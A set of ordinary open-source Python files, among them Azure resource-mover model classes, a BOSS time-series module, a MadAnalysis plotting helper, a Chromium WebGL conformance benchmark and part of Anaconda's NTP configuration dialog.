def __init__(
self,
*,
target_resource_name: str,
zone_redundant: Optional[Union[str, "ZoneRedundant"]] = None,
**kwargs
):
super(SqlElasticPoolResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Sql/servers/elasticPools' # type: str
self.zone_redundant = zone_redundant
class SqlServerResourceSettings(ResourceSettings):
"""Defines the SQL Server resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
**kwargs
):
super(SqlServerResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Sql/servers' # type: str
class SubnetReference(ProxyResourceReference):
"""Defines reference to subnet.
All required parameters must be populated in order to send to Azure.
:param source_arm_resource_id: Required. Gets the ARM resource ID of the tracked resource being
referenced.
:type source_arm_resource_id: str
:param name: Gets the name of the proxy resource on the target side.
:type name: str
"""
_validation = {
'source_arm_resource_id': {'required': True},
}
_attribute_map = {
'source_arm_resource_id': {'key': 'sourceArmResourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
*,
source_arm_resource_id: str,
name: Optional[str] = None,
**kwargs
):
super(SubnetReference, self).__init__(source_arm_resource_id=source_arm_resource_id, name=name, **kwargs)
class SubnetResourceSettings(msrest.serialization.Model):
"""Defines the virtual network subnets resource settings.
:param name: Gets or sets the Subnet name.
:type name: str
:param address_prefix: Gets or sets address prefix for the subnet.
:type address_prefix: str
:param network_security_group: Defines reference to NSG.
:type network_security_group: ~resource_mover_service_api.models.NsgReference
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'address_prefix': {'key': 'addressPrefix', 'type': 'str'},
'network_security_group': {'key': 'networkSecurityGroup', 'type': 'NsgReference'},
}
def __init__(
self,
*,
name: Optional[str] = None,
address_prefix: Optional[str] = None,
network_security_group: Optional["NsgReference"] = None,
**kwargs
):
super(SubnetResourceSettings, self).__init__(**kwargs)
self.name = name
self.address_prefix = address_prefix
self.network_security_group = network_security_group
class Summary(msrest.serialization.Model):
"""Summary item.
:param count: Gets the count.
:type count: int
:param item: Gets the item.
:type item: str
"""
_attribute_map = {
'count': {'key': 'count', 'type': 'int'},
'item': {'key': 'item', 'type': 'str'},
}
def __init__(
self,
*,
count: Optional[int] = None,
item: Optional[str] = None,
**kwargs
):
super(Summary, self).__init__(**kwargs)
self.count = count
self.item = item
class SummaryCollection(msrest.serialization.Model):
"""Summary Collection.
:param field_name: Gets or sets the field name on which summary is done.
:type field_name: str
:param summary: Gets or sets the list of summary items.
:type summary: list[~resource_mover_service_api.models.Summary]
"""
_attribute_map = {
'field_name': {'key': 'fieldName', 'type': 'str'},
'summary': {'key': 'summary', 'type': '[Summary]'},
}
def __init__(
self,
*,
field_name: Optional[str] = None,
summary: Optional[List["Summary"]] = None,
**kwargs
):
super(SummaryCollection, self).__init__(**kwargs)
self.field_name = field_name
self.summary = summary
class UnresolvedDependenciesFilter(msrest.serialization.Model):
"""Unresolved dependencies contract.
:param properties:
:type properties: ~resource_mover_service_api.models.UnresolvedDependenciesFilterProperties
"""
_attribute_map = {
'properties': {'key': 'properties', 'type': 'UnresolvedDependenciesFilterProperties'},
}
def __init__(
self,
*,
properties: Optional["UnresolvedDependenciesFilterProperties"] = None,
**kwargs
):
super(UnresolvedDependenciesFilter, self).__init__(**kwargs)
self.properties = properties
class UnresolvedDependenciesFilterProperties(msrest.serialization.Model):
"""UnresolvedDependenciesFilterProperties.
:param count: The count of the resource.
:type count: int
"""
_attribute_map = {
'count': {'key': 'count', 'type': 'int'},
}
def __init__(
self,
*,
count: Optional[int] = None,
**kwargs
):
super(UnresolvedDependenciesFilterProperties, self).__init__(**kwargs)
self.count = count
class UnresolvedDependency(msrest.serialization.Model):
"""Unresolved dependency.
:param count: Gets or sets the count.
:type count: int
:param id: Gets or sets the arm id of the dependency.
:type id: str
"""
_attribute_map = {
'count': {'key': 'count', 'type': 'int'},
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
*,
count: Optional[int] = None,
id: Optional[str] = None,
**kwargs
):
super(UnresolvedDependency, self).__init__(**kwargs)
self.count = count
self.id = id
class UnresolvedDependencyCollection(msrest.serialization.Model):
"""Unresolved dependency collection.
Variables are only populated by the server, and will be ignored when sending a request.
:param value: Gets or sets the list of unresolved dependencies.
:type value: list[~resource_mover_service_api.models.UnresolvedDependency]
:param next_link: Gets or sets the value of next link.
:type next_link: str
:ivar summary_collection: Gets or sets the list of summary items and the field on which summary
is done.
:vartype summary_collection: ~resource_mover_service_api.models.SummaryCollection
:ivar total_count: Gets the total count.
:vartype total_count: long
"""
_validation = {
'summary_collection': {'readonly': True},
'total_count': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[UnresolvedDependency]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
'summary_collection': {'key': 'summaryCollection', 'type': 'SummaryCollection'},
'total_count': {'key': 'totalCount', 'type': 'long'},
}
def __init__(
self,
*,
value: Optional[List["UnresolvedDependency"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(UnresolvedDependencyCollection, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
self.summary_collection = None
self.total_count = None
class UpdateMoveCollectionRequest(msrest.serialization.Model):
"""Defines the request body for updating move collection.
:param tags: A set of tags. Gets or sets the Resource tags.
:type tags: dict[str, str]
:param identity: Defines the MSI properties of the Move Collection.
:type identity: ~resource_mover_service_api.models.Identity
"""
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'Identity'},
}
def __init__(
self,
*,
tags: Optional[Dict[str, str]] = None,
identity: Optional["Identity"] = None,
**kwargs
):
super(UpdateMoveCollectionRequest, self).__init__(**kwargs)
self.tags = tags
self.identity = identity
class VirtualMachineResourceSettings(ResourceSettings):
"""Gets or sets the virtual machine resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param target_availability_zone: Gets or sets the target availability zone. Possible values
include: "1", "2", "3", "NA".
:type target_availability_zone: str or
~resource_mover_service_api.models.TargetAvailabilityZone
:param target_vm_size: Gets or sets the target virtual machine size.
:type target_vm_size: str
:param target_availability_set_id: Gets or sets the target availability set id for virtual
machines not in an availability set at source.
:type target_availability_set_id: str
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'target_availability_zone': {'key': 'targetAvailabilityZone', 'type': 'str'},
'target_vm_size': {'key': 'targetVmSize', 'type': 'str'},
'target_availability_set_id': {'key': 'targetAvailabilitySetId', 'type': 'str'},
}
def __init__(
self,
*,
target_resource_name: str,
target_availability_zone: Optional[Union[str, "TargetAvailabilityZone"]] = None,
target_vm_size: Optional[str] = None,
target_availability_set_id: Optional[str] = None,
**kwargs
):
super(VirtualMachineResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Compute/virtualMachines' # type: str
self.target_availability_zone = target_availability_zone
self.target_vm_size = target_vm_size
self.target_availability_set_id = target_availability_set_id
class VirtualNetworkResourceSettings(ResourceSettings):
"""Defines the virtual network resource settings.
All required parameters must be populated in order to send to Azure.
:param resource_type: Required. The resource type. For example, the value can be
Microsoft.Compute/virtualMachines.Constant filled by server.
:type resource_type: str
:param target_resource_name: Required. Gets or sets the target Resource name.
:type target_resource_name: str
:param enable_ddos_protection: Gets or sets a value indicating whether gets or sets whether the
DDOS protection should be switched on.
:type enable_ddos_protection: bool
:param address_space: Gets or sets the address prefixes for the virtual network.
:type address_space: list[str]
:param dns_servers: Gets or sets DHCPOptions that contains an array of DNS servers available to
VMs
deployed in the virtual network.
:type dns_servers: list[str]
:param subnets: Gets or sets List of subnets in a VirtualNetwork.
:type subnets: list[~resource_mover_service_api.models.SubnetResourceSettings]
"""
_validation = {
'resource_type': {'required': True},
'target_resource_name': {'required': True},
}
_attribute_map = {
'resource_type': {'key': 'resourceType', 'type': 'str'},
'target_resource_name': {'key': 'targetResourceName', 'type': 'str'},
'enable_ddos_protection': {'key': 'enableDdosProtection', 'type': 'bool'},
'address_space': {'key': 'addressSpace', 'type': '[str]'},
'dns_servers': {'key': 'dnsServers', 'type': '[str]'},
'subnets': {'key': 'subnets', 'type': '[SubnetResourceSettings]'},
}
def __init__(
self,
*,
target_resource_name: str,
enable_ddos_protection: Optional[bool] = None,
address_space: Optional[List[str]] = None,
dns_servers: Optional[List[str]] = None,
subnets: Optional[List["SubnetResourceSettings"]] = None,
**kwargs
):
super(VirtualNetworkResourceSettings, self).__init__(target_resource_name=target_resource_name, **kwargs)
self.resource_type = 'Microsoft.Network/virtualNetworks' # type: str
self.enable_ddos_protection = enable_ddos_protection
self.address_space = address_space
self.dns_servers = dns_servers
self.subnets = subnets
| Azure/azure-sdk-for-python | sdk/resourcemover/azure-mgmt-resourcemover/azure/mgmt/resourcemover/models/_models_py3.py | Python | mit | 93,853 |
"""
.. module:: BOSS
BOSS
*************
:Description: BOSS
:Authors: bejar
:Version:
:Created on: 15/02/2017 13:48
"""
import numpy as np
from kemlglearn.preprocessing import Discretizer
import seaborn as sn
from collections import Counter
from kemlglearn.time_series.decomposition.MFT import mft
__author__ = 'bejar'
def boss_distance(histo1, histo2):
"""
BOSS distance between two histograms
Not really a distance because it is not symmetric
:param histo1:
:param histo2:
:return:
"""
val = 0
for w in histo1:
if w in histo2:
val += (histo1[w] - histo2[w]) ** 2
else:
val += histo1[w] * histo1[w]
return val
def euclidean_distance(histo1, histo2):
"""
Euclidean distance between two histograms
:param histo1:
:param histo2:
:return:
"""
val = 0
lnot = []
for w in histo1:
if w in histo2:
val += (histo1[w] - histo2[w]) ** 2
lnot.append(w)
else:
val += histo1[w] * histo1[w]
for w in histo2:
if w not in lnot:
val += histo2[w] * histo2[w]
return val
def cosine_similarity(histo1, histo2):
"""
Euclidean distance between two histograms
:param histo1:
:param histo2:
:return:
"""
val = 0.0
norm1 = 0.0
for w in histo1:
if w in histo2:
val += (histo1[w] * histo2[w])
norm1 += histo1[w] ** 2
norm2 = 0.0
for w in histo2:
norm2 += histo2[w] ** 2
return val / (np.sqrt(norm1) * np.sqrt(norm2))
def hamming_distance(histo1, histo2):
"""
Euclidean distance between two histograms
:param histo1:
:param histo2:
:return:
"""
val = 0
lnot = []
for w in histo1:
if w in histo2:
val += np.abs((histo1[w] - histo2[w]))
lnot.append(w)
else:
val += histo1[w]
for w in histo2:
if w not in lnot:
val += histo2[w]
return val
def bin_hamming_distance(histo1, histo2):
"""
jaccard distance between two histograms
:param histo1:
:param histo2:
:return:
"""
s1 = set(histo1.keys())
s2 = set(histo2.keys())
return len(s1) + len(s2) - len(s1.intersection(s2))
class Boss():
"""
Computes the BOSS words for a dictionary of series
"""
def __init__(self, dseries, sampling, butfirst=False):
"""
:param dseries:
:param sampling:
"""
self.series = dseries
self.sampling = sampling
self.coefs = {}
self.codes = {}
self.butfirst = butfirst
def discretization_intervals(self, ncoef, wsize, vsize):
"""
Computes the BOSS discretization for the signals, the word length is 2*ncoefs (real and imaginary part) except
is there are coefficients that are zero
:param ncoef:
:param wsize:
:return:
"""
all_coefs = []
for s in self.series:
coefs = mft(self.series[s], self.sampling, ncoef, wsize, butfirst=self.butfirst)
lcoefs = []
for i in range(coefs.shape[1]):
lcoefs.append(coefs[:, i].real)
lcoefs.append(coefs[:, i].imag)
all_coefs.append(np.stack(lcoefs, axis=-1))
self.coefs[s] = all_coefs[-1]
X = np.concatenate(all_coefs)
self.disc = Discretizer(method='frequency', bins=vsize)
self.disc.fit(X)
def discretize(self):
"""
Computes the words for each time series
:param series:
:return:
"""
vocabulary = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def word(vec):
"""
:param v:
:return:
"""
w = ''
for v in vec:
w += vocabulary[int(v)]
return w
for c in self.coefs:
sdisc = self.disc.transform(self.coefs[c], copy=True).real
prevw = word(sdisc[0])
lvoc = [prevw]
for i in range(1, sdisc.shape[0]):
nword = word(sdisc[i])
if nword != prevw:
lvoc.append(nword)
self.codes[c] = Counter(lvoc)
# print(c, self.codes[c])
if __name__ == '__main__':
pass
# wlen = 64
# voclen = 3
# ncoefs = 3
#
#
# boss = Boss(dseries, 10)
# boss.discretization_intervals(ncoefs, wlen, voclen)
# boss.discretize()
| bejar/kemlglearn | kemlglearn/time_series/discretization/BOSS.py | Python | mit | 4,543 |
################################################################################
#
# Copyright (C) 2012-2013 Eric Conte, Benjamin Fuks
# The MadAnalysis development team, email: <ma5team@iphc.cnrs.fr>
#
# This file is part of MadAnalysis 5.
# Official website: <https://launchpad.net/madanalysis5>
#
# MadAnalysis 5 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# MadAnalysis 5 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with MadAnalysis 5. If not, see <http://www.gnu.org/licenses/>
#
################################################################################
from madanalysis.enumeration.uncertainty_type import UncertaintyType
from madanalysis.enumeration.normalize_type import NormalizeType
from madanalysis.layout.root_config import RootConfig
from madanalysis.enumeration.report_format_type import ReportFormatType
from madanalysis.enumeration.observable_type import ObservableType
from madanalysis.enumeration.color_type import ColorType
from madanalysis.enumeration.linestyle_type import LineStyleType
from madanalysis.enumeration.backstyle_type import BackStyleType
from madanalysis.enumeration.stacking_method_type import StackingMethodType
from madanalysis.layout.root_config import RootConfig
from math import sqrt
class MergingPlotsForDataset:
def __init__(self,main,dataset):
self.dataset = dataset
self.main = main
self.histos = []
def __len__(self):
return len(self.histos)
def __getitem__(self,i):
return self.histos[i]
# Computing integral
def FinalizeReading(self):
for histo in self.histos:
histo.FinalizeReading(self.main,self.dataset)
# Computing integral
def CreateHistogram(self):
for histo in self.histos:
histo.CreateHistogram()
| Lana-B/Pheno4T | madanalysis/layout/merging_plots_for_dataset.py | Python | gpl-3.0 | 2,345 |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import optparse
import os
import sys
import webgl_conformance_expectations
from telemetry import benchmark as benchmark_module
from telemetry.core import util
from telemetry.internal.browser import browser_finder
from telemetry.page import page as page_module
from telemetry.page import page_test
from telemetry.page import shared_page_state
from telemetry.story.story_set import StorySet
conformance_path = os.path.join(
util.GetChromiumSrcDir(),
'third_party', 'webgl', 'src', 'sdk', 'tests')
conformance_harness_script = r"""
var testHarness = {};
testHarness._allTestSucceeded = true;
testHarness._messages = '';
testHarness._failures = 0;
testHarness._finished = false;
testHarness._originalLog = window.console.log;
testHarness.log = function(msg) {
testHarness._messages += msg + "\n";
testHarness._originalLog.apply(window.console, [msg]);
}
testHarness.reportResults = function(url, success, msg) {
testHarness._allTestSucceeded = testHarness._allTestSucceeded && !!success;
if(!success) {
testHarness._failures++;
if(msg) {
testHarness.log(msg);
}
}
};
testHarness.notifyFinished = function(url) {
testHarness._finished = true;
};
testHarness.navigateToPage = function(src) {
var testFrame = document.getElementById("test-frame");
testFrame.src = src;
};
window.webglTestHarness = testHarness;
window.parent.webglTestHarness = testHarness;
window.console.log = testHarness.log;
window.onerror = function(message, url, line) {
testHarness.reportResults(null, false, message);
testHarness.notifyFinished(null);
};
"""
def _DidWebGLTestSucceed(tab):
return tab.EvaluateJavaScript('webglTestHarness._allTestSucceeded')
def _WebGLTestMessages(tab):
return tab.EvaluateJavaScript('webglTestHarness._messages')
def _CompareVersion(version1, version2):
ver_num1 = [int(x) for x in version1.split('.')]
ver_num2 = [int(x) for x in version2.split('.')]
size = min(len(ver_num1), len(ver_num2))
return cmp(ver_num1[0:size], ver_num2[0:size])
class WebglConformanceValidator(page_test.PageTest):
def __init__(self):
super(WebglConformanceValidator, self).__init__()
def ValidateAndMeasurePage(self, page, tab, results):
if not _DidWebGLTestSucceed(tab):
raise page_test.Failure(_WebGLTestMessages(tab))
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs([
'--disable-gesture-requirement-for-media-playback',
'--disable-domain-blocking-for-3d-apis',
'--disable-gpu-process-crash-limit'
])
browser = browser_finder.FindBrowser(options.finder_options)
if (browser.target_os.startswith('android') and
browser.browser_type == 'android-webview-shell'):
# TODO(kbr): this is overly broad. We'd like to do this only on
# Nexus 9. It'll go away shortly anyway. crbug.com/499928
#
# The --ignore_egl_sync_failures is only there to work around
# some strange failure on the Nexus 9 bot, not reproducible on
# local hardware.
options.AppendExtraBrowserArgs([
'--disable-gl-extensions=GL_EXT_disjoint_timer_query',
'--ignore_egl_sync_failures'
])
class Webgl2ConformanceValidator(WebglConformanceValidator):
def __init__(self):
super(Webgl2ConformanceValidator, self).__init__()
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs([
'--disable-gesture-requirement-for-media-playback',
'--disable-domain-blocking-for-3d-apis',
'--disable-gpu-process-crash-limit',
'--enable-unsafe-es3-apis'
])
class WebglConformancePage(page_module.Page):
def __init__(self, story_set, test, expectations):
super(WebglConformancePage, self).__init__(
url='file://' + test, page_set=story_set, base_dir=story_set.base_dir,
shared_page_state_class=shared_page_state.SharedDesktopPageState,
name=('WebglConformance.%s' %
test.replace('/', '_').replace('-', '_').
replace('\\', '_').rpartition('.')[0].replace('.', '_')))
self.script_to_evaluate_on_commit = conformance_harness_script
self._expectations = expectations
def RunNavigateSteps(self, action_runner):
num_tries = 1 + self._expectations.GetFlakyRetriesForPage(
self, action_runner.tab.browser)
# This loop will run once for tests that aren't marked flaky, and
# will fall through to the validator's ValidateAndMeasurePage on
# the last iteration.
for ii in xrange(0, num_tries):
super(WebglConformancePage, self).RunNavigateSteps(action_runner)
action_runner.WaitForJavaScriptCondition(
'webglTestHarness._finished', timeout_in_seconds=180)
if ii < num_tries - 1:
if _DidWebGLTestSucceed(action_runner.tab):
return
else:
print 'FLAKY TEST FAILURE, retrying: ' + self.display_name
print 'Error messages from test run:'
print _WebGLTestMessages(action_runner.tab)
class WebglConformance(benchmark_module.Benchmark):
"""Conformance with Khronos WebGL Conformance Tests"""
def __init__(self):
super(WebglConformance, self).__init__(max_failures=10)
self._cached_expectations = None
@classmethod
def Name(cls):
return 'webgl_conformance'
@classmethod
def AddBenchmarkCommandLineArgs(cls, group):
group.add_option('--webgl-conformance-version',
help='Version of the WebGL conformance tests to run.',
default='1.0.4')
group.add_option('--webgl2-only',
help='Whether we include webgl 1 tests if version is 2.0.0 or above.',
default='false')
def CreatePageTest(self, options):
if _CompareVersion(options.webgl_conformance_version, '2.0.0') >= 0:
return Webgl2ConformanceValidator()
return WebglConformanceValidator()
def CreateStorySet(self, options):
tests = self._ParseTests('00_test_list.txt',
options.webgl_conformance_version,
(options.webgl2_only == 'true'),
None)
ps = StorySet(serving_dirs=[''], base_dir=conformance_path)
expectations = self.GetExpectations()
for test in tests:
ps.AddStory(WebglConformancePage(ps, test, expectations))
return ps
def GetExpectations(self):
if not self._cached_expectations:
self._cached_expectations = (
webgl_conformance_expectations.WebGLConformanceExpectations(
conformance_path))
return self._cached_expectations
def CreateExpectations(self):
return self.GetExpectations()
@staticmethod
def _ParseTests(path, version, webgl2_only, folder_min_version):
test_paths = []
current_dir = os.path.dirname(path)
full_path = os.path.normpath(os.path.join(conformance_path, path))
if not os.path.exists(full_path):
raise Exception('The WebGL conformance test path specified ' +
'does not exist: ' + full_path)
with open(full_path, 'r') as f:
for line in f:
line = line.strip()
if not line:
continue
if line.startswith('//') or line.startswith('#'):
continue
line_tokens = line.split(' ')
test_name = line_tokens[-1]
i = 0
min_version = None
while i < len(line_tokens):
token = line_tokens[i]
if token == '--min-version':
i += 1
min_version = line_tokens[i]
i += 1
min_version_to_compare = min_version or folder_min_version
if (min_version_to_compare and
_CompareVersion(version, min_version_to_compare) < 0):
continue
if (webgl2_only and (not ('.txt' in test_name)) and
((not min_version_to_compare) or
(not min_version_to_compare.startswith('2')))):
continue
if '.txt' in test_name:
include_path = os.path.join(current_dir, test_name)
# We only check min-version >= 2.0.0 for the top level list.
test_paths += WebglConformance._ParseTests(
include_path, version, webgl2_only, min_version_to_compare)
else:
test = os.path.join(current_dir, test_name)
test_paths.append(test)
return test_paths
| TheTypoMaster/chromium-crosswalk | content/test/gpu/gpu_tests/webgl_conformance.py | Python | bsd-3-clause | 8,433 |
# Datetime configuration spoke class
#
# Copyright (C) 2012-2013 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Vratislav Podzimek <vpodzime@redhat.com>
#
import logging
log = logging.getLogger("anaconda")
from gi.repository import GLib, Gdk, Gtk, TimezoneMap
from pyanaconda.ui.communication import hubQ
from pyanaconda.ui.common import FirstbootSpokeMixIn
from pyanaconda.ui.gui import GUIObject
from pyanaconda.ui.gui.spokes import NormalSpoke
from pyanaconda.ui.categories.localization import LocalizationCategory
from pyanaconda.ui.gui.utils import gtk_action_nowait, gtk_action_wait, gtk_call_once, override_cell_property
from pyanaconda.ui.gui.helpers import GUIDialogInputCheckHandler
from pyanaconda.ui.helpers import InputCheck
from pyanaconda.i18n import _, CN_
from pyanaconda.timezone import NTP_SERVICE, get_all_regions_and_timezones, get_timezone, is_valid_timezone
from pyanaconda.localization import get_xlated_timezone, resolve_date_format
from pyanaconda import iutil
from pyanaconda import isys
from pyanaconda import network
from pyanaconda import nm
from pyanaconda import ntp
from pyanaconda import flags
from pyanaconda import constants
from pyanaconda.threads import threadMgr, AnacondaThread
import datetime
import re
import threading
import locale as locale_mod
__all__ = ["DatetimeSpoke"]
SERVER_OK = 0
SERVER_NOK = 1
SERVER_QUERY = 2
DEFAULT_TZ = "America/New_York"
SPLIT_NUMBER_SUFFIX_RE = re.compile(r'([^0-9]*)([-+])([0-9]+)')
def _compare_regions(reg_xlated1, reg_xlated2):
"""Compare two pairs of regions and their translations."""
reg1, xlated1 = reg_xlated1
reg2, xlated2 = reg_xlated2
# sort the Etc timezones to the end
if reg1 == "Etc" and reg2 == "Etc":
return 0
elif reg1 == "Etc":
return 1
elif reg2 == "Etc":
return -1
else:
# otherwise compare the translated names
return locale_mod.strcoll(xlated1, xlated2)
def _compare_cities(city_xlated1, city_xlated2):
"""Compare two paris of cities and their translations."""
# if there are "cities" ending with numbers (like GMT+-X), we need to sort
# them based on their numbers
val1 = city_xlated1[1]
val2 = city_xlated2[1]
match1 = SPLIT_NUMBER_SUFFIX_RE.match(val1)
match2 = SPLIT_NUMBER_SUFFIX_RE.match(val2)
if match1 is None and match2 is None:
# no +-X suffix, just compare the strings
return locale_mod.strcoll(val1, val2)
if match1 is None or match2 is None:
# one with the +-X suffix, compare the prefixes
if match1:
prefix, _sign, _suffix = match1.groups()
return locale_mod.strcoll(prefix, val2)
else:
prefix, _sign, _suffix = match2.groups()
return locale_mod.strcoll(val1, prefix)
# both have the +-X suffix
prefix1, sign1, suffix1 = match1.groups()
prefix2, sign2, suffix2 = match2.groups()
if prefix1 == prefix2:
# same prefixes, let signs determine
return cmp(int(sign1 + suffix1), int(sign2 + suffix2))
else:
# compare prefixes
return locale_mod.strcoll(prefix1, prefix2)
def _new_date_field_box(store):
"""
Creates new date field box (a combobox and a label in a horizontal box) for
a given store.
"""
box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
suffix_label = Gtk.Label()
renderer = Gtk.CellRendererText()
combo = Gtk.ComboBox(model=store)
combo.pack_start(renderer, False)
# idx is column 0, string we want to show is 1
combo.add_attribute(renderer, "text", 1)
box.pack_start(combo, False, False, 0)
box.pack_start(suffix_label, False, False, 0)
return (box, combo, suffix_label)
class NTPconfigDialog(GUIObject, GUIDialogInputCheckHandler):
builderObjects = ["ntpConfigDialog", "addImage", "serversStore"]
mainWidgetName = "ntpConfigDialog"
uiFile = "spokes/datetime_spoke.glade"
def __init__(self, *args):
GUIObject.__init__(self, *args)
GUIDialogInputCheckHandler.__init__(self)
#epoch is increased when serversStore is repopulated
self._epoch = 0
self._epoch_lock = threading.Lock()
@property
def working_server(self):
for row in self._serversStore:
if row[1] == SERVER_OK and row[2]:
#server is checked and working
return row[0]
return None
@property
def servers(self):
ret = list()
for row in self._serversStore:
if row[2]:
#server checked
ret.append(row[0])
return ret
def _render_working(self, column, renderer, model, itr, user_data=None):
#get the value in the second column
value = model[itr][1]
if value == SERVER_QUERY:
return "dialog-question"
elif value == SERVER_OK:
return "emblem-default"
else:
return "dialog-error"
def initialize(self):
self.window.set_size_request(500, 400)
workingColumn = self.builder.get_object("workingColumn")
workingRenderer = self.builder.get_object("workingRenderer")
override_cell_property(workingColumn, workingRenderer, "icon-name",
self._render_working)
self._serverEntry = self.builder.get_object("serverEntry")
self._serversStore = self.builder.get_object("serversStore")
self._addButton = self.builder.get_object("addButton")
# Validate the server entry box
self._serverCheck = self.add_check(self._serverEntry, self._validateServer)
self._serverCheck.update_check_status()
self._initialize_store_from_config()
def _initialize_store_from_config(self):
self._serversStore.clear()
if self.data.timezone.ntpservers:
for server in self.data.timezone.ntpservers:
self._add_server(server)
else:
try:
for server in ntp.get_servers_from_config():
self._add_server(server)
except ntp.NTPconfigError:
log.warning("Failed to load NTP servers configuration")
def _validateServer(self, inputcheck):
server = self.get_input(inputcheck.input_obj)
# If not set, fail the check to keep the button insensitive, but don't
# display an error
if not server:
return InputCheck.CHECK_SILENT
(valid, error) = network.sanityCheckHostname(server)
if not valid:
return "'%s' is not a valid hostname: %s" % (server, error)
else:
return InputCheck.CHECK_OK
def set_status(self, inputcheck):
# Use GUIDialogInputCheckHandler to set the error message
GUIDialogInputCheckHandler.set_status(self, inputcheck)
# Set the sensitivity of the add button based on the result
self._addButton.set_sensitive(inputcheck.check_status == InputCheck.CHECK_OK)
def refresh(self):
self._serverEntry.grab_focus()
def refresh_servers_state(self):
itr = self._serversStore.get_iter_first()
while itr:
self._refresh_server_working(itr)
itr = self._serversStore.iter_next(itr)
def run(self):
self.window.show()
rc = self.window.run()
self.window.hide()
#OK clicked
if rc == 1:
new_servers = list()
for row in self._serversStore:
#if server checked
if row[2]:
new_servers.append(row[0])
if flags.can_touch_runtime_system("save NTP servers configuration"):
ntp.save_servers_to_config(new_servers)
iutil.restart_service(NTP_SERVICE)
#Cancel clicked, window destroyed...
else:
self._epoch_lock.acquire()
self._epoch += 1
self._epoch_lock.release()
self._initialize_store_from_config()
return rc
def _set_server_ok_nok(self, itr, epoch_started):
"""
If the server is working, set its data to SERVER_OK, otherwise set its
data to SERVER_NOK.
:param itr: iterator of the $server's row in the self._serversStore
"""
@gtk_action_nowait
def set_store_value(arg_tuple):
"""
We need a function for this, because this way it can be added to
the MainLoop with thread-safe GLib.idle_add (but only with one
argument).
:param arg_tuple: (store, itr, column, value)
"""
(store, itr, column, value) = arg_tuple
store.set_value(itr, column, value)
orig_hostname = self._serversStore[itr][0]
server_working = ntp.ntp_server_working(self._serversStore[itr][0])
#do not let dialog change epoch while we are modifying data
self._epoch_lock.acquire()
#check if we are in the same epoch as the dialog (and the serversStore)
#and if the server wasn't changed meanwhile
if epoch_started == self._epoch:
actual_hostname = self._serversStore[itr][0]
if orig_hostname == actual_hostname:
if server_working:
set_store_value((self._serversStore,
itr, 1, SERVER_OK))
else:
set_store_value((self._serversStore,
itr, 1, SERVER_NOK))
self._epoch_lock.release()
@gtk_action_nowait
def _refresh_server_working(self, itr):
""" Runs a new thread with _set_server_ok_nok(itr) as a taget. """
self._serversStore.set_value(itr, 1, SERVER_QUERY)
threadMgr.add(AnacondaThread(prefix="AnaNTPserver",
target=self._set_server_ok_nok,
args=(itr, self._epoch)))
def _add_server(self, server):
"""
Checks if a given server is a valid hostname and if yes, adds it
to the list of servers.
:param server: string containing hostname
"""
for row in self._serversStore:
if row[0] == server:
#do not add duplicate items
return
itr = self._serversStore.append([server, SERVER_QUERY, True])
#do not block UI while starting thread (may take some time)
self._refresh_server_working(itr)
def on_entry_activated(self, entry, *args):
# Check that the input check has passed
if self._serverCheck.check_status == InputCheck.CHECK_OK:
self._add_server(entry.get_text())
entry.set_text("")
def on_add_clicked(self, *args):
self._serverEntry.emit("activate")
def on_use_server_toggled(self, renderer, path, *args):
itr = self._serversStore.get_iter(path)
old_value = self._serversStore[itr][2]
self._serversStore.set_value(itr, 2, not old_value)
def on_server_edited(self, renderer, path, new_text, *args):
if not path:
return
(valid, error) = network.sanityCheckHostname(new_text)
if not valid:
log.error("'%s' is not a valid hostname: %s", new_text, error)
return
